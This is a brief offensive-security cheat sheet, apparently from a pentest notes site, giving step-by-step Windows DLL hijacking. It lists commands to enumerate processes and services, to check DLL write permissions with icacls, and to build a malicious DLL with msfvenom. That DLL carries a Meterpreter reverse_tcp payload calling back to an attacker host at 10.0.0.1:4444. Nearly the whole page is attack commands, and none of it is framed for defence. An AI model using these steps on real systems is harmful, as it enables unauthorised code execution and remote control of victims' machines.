DLL Hijacking
Exploit
1. Enumerate Services (Processes)
tasklist
Get-Process
ps2. Identify the Service
sc qc "example-service"3. Check Write Permission of DLL
icacls \path\to\example.dll4. Create Malicious DLL
# Replace 10.0.0.1 with your local ip
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f dll -o evil.dllLast updated